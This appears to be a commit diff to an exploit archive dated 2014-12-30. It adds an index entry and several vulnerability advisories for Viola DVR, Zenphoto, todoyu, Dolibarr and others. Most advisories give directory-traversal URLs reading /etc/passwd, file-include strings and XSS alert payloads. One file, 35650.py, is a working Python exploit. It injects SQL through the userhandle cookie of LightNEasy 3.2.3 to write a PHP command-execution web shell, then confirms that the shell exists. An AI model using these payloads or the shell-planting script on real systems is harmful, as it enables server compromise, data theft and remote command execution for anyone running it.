Update: 2014-12-30

7 new exploits

files.csv

@@ -8,7 +8,7 @@ id,file,description,date,author,platform,type,port
 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow Exploit",2003-04-07,"H D Moore",linux,remote,139
 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0
 9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0
-10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
+10,platforms/linux/remote/10.c,"Samba <= 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
 11,platforms/linux/dos/11.c,"Apache <= 2.0.44 Linux - Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0
 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0
@@ -32106,3 +32106,10 @@ id,file,description,date,author,platform,type,port
 35641,platforms/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/MafletClose.mafService RENDER_MAFLET Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0
 35642,platforms/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0
 35643,platforms/php/webapps/35643.txt,"webSPELL 4.2.2a Multiple Cross-Site Scripting Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0
+35644,platforms/linux/remote/35644.txt,"Viola DVR VIO-4/1000 Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,linux,remote,0
+35645,platforms/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 'module' Parameter Cross Site Scripting Vulnerability",2011-04-20,Kurd-Team,php,webapps,0
+35647,platforms/php/webapps/35647.txt,"SyCtel Design 'menu' Parameter Multiple Local File Include Vulnerabilities",2011-04-21,"Ashiyane Digital Security Team",php,webapps,0
+35648,platforms/php/webapps/35648.txt,"Zenphoto 1.4.0.3 '_zp_themeroot' Parameter Multiple Cross Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",php,webapps,0
+35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 'lang' Parameter Cross Site Scripting Vulnerability",2011-04-22,"AutoSec Tools",php,webapps,0
+35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 'userhandle' Cookie Parameter SQL Injection Vulnerability",2011-04-21,"AutoSec Tools",php,webapps,0
+35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 Local File Include and Cross Site Scripting Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0

platforms/android/remote/35637.py

@@ -1,3 +1,6 @@
+# Mirror: http://pastebin.com/raw.php?i=CZChGAnG
+# Video: https://www.youtube.com/watch?v=V7bnLOohqqI
+
 #!/usr/bin/python
 #-*- coding: utf-8 -*
  

platforms/linux/remote/35644.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/47509/info
+
+Viola DVR is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.
+
+Viola DVR VIO-4/1000 is vulnerable; other products may also be affected. 
+
+http://www.example.com/cgi-bin/wappwd?FILEFAIL=../../../etc/passwd
+http://www.example.com/cgi-bin/wapopen?FILECAMERA=../../../etc/passwd 

platforms/php/webapps/35645.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47519/info
+
+Automagick Tube Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Automagick Tube Script 1.4.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?module=<script>alert(8888)</script> 

platforms/php/webapps/35647.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47526/info
+
+SyCtel Design is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 
+
+
+http://www.example.com/index.php?menu=../../../proc/self/environ
+http://www.example.com/index1.php?menu=../../../etc/passwd 

platforms/php/webapps/35648.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/47528/info
+
+Zenphoto is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Zenphoto 1.4.0.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/themes/zenpage/slideshow.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
+
+http://www.example.com/themes/stopdesign/comment_form.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E 

platforms/php/webapps/35649.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47540/info
+
+todoyu is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+todoyu 2.0.8 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/todoyu/lib/js/jscalendar/php/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E 

platforms/php/webapps/35650.py

@@ -0,0 +1,84 @@
+source: http://www.securityfocus.com/bid/47541/info
+
+LightNEasy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+LightNEasy 3.2.3 is vulnerable; other versions may also be affected. 
+
+# ------------------------------------------------------------------------
+# Software................LightNEasy 3.2.3
+# Vulnerability...........SQL Injection
+# Threat Level............Critical (4/5)
+# Download................http://www.lightneasy.org/
+# Discovery Date..........4/21/2011
+# Tested On...............Windows Vista + XAMPP
+# ------------------------------------------------------------------------
+# Author..................AutoSec Tools
+# Site....................http://www.autosectools.com/
+# Email...................John Leitch <john@autosectools.com>
+# ------------------------------------------------------------------------
+# 
+# 
+# --Description--
+# 
+# A SQL injection vulnerability in LightNEasy 3.2.3 can be exploited to
+# extract arbitrary data. In some environments it may be possible to
+# create a PHP shell.
+# 
+# 
+# --PoC--
+
+import socket
+
+host = 'localhost'
+path = '/lne323'
+shell_path = '/shell.php'
+port = 80
+
+def upload_shell():
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+    s.settimeout(8)    
+
+    s.send('POST ' + path + '/index.php?do=&page= HTTP/1.1\r\n'
+           'Host: localhost\r\n'
+           'Proxy-Connection: keep-alive\r\n'
+           'User-Agent: x\r\n'
+           'Content-Length: 73\r\n'
+           'Cache-Control: max-age=0\r\n'
+           'Origin: null\r\n'
+           'Content-Type: multipart/form-data; boundary=----x\r\n'
+           'Cookie: userhandle=%22UNION/**/SELECT/**/CONCAT(char(60),char(63),char(112),char(104),char(112),char(32),char(115),char(121),char(115),char(116),char(101),char(109),char(40),char(36),char(95),char(71),char(69),char(84),char(91),char(39),char(67),char(77),char(68),char(39),char(93),char(41),char(59),char(32),char(63),char(62)),%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22/**/FROM/**/dual/**/INTO/**/OUTFILE%22../../htdocs/shell.php%22%23\r\n'
+           'Accept: text/html\r\n'
+           'Accept-Language: en-US,en;q=0.8\r\n'
+           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="submit"\r\n'
+           '\r\n'
+           '\r\n'
+           '------x--\r\n'
+           '\r\n')
+
+    resp = s.recv(8192)
+ 
+    http_ok = 'HTTP/1.1 200 OK'
+    
+    if http_ok not in resp[:len(http_ok)]:
+        print 'error uploading shell'
+        return
+    else: print 'shell uploaded'
+
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+    s.settimeout(8)     
+ 
+    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
+           'Host: ' + host + '\r\n\r\n')
+
+    if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'        
+    else: print 'shell located at http://' + host + shell_path
+
+upload_shell()
+

platforms/php/webapps/35651.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/47542/info
+
+Dolibarr is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the affected application. Information harvested may aid in further attacks.
+
+The attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Dolibarr 3.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
+
+http://www.example.com/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00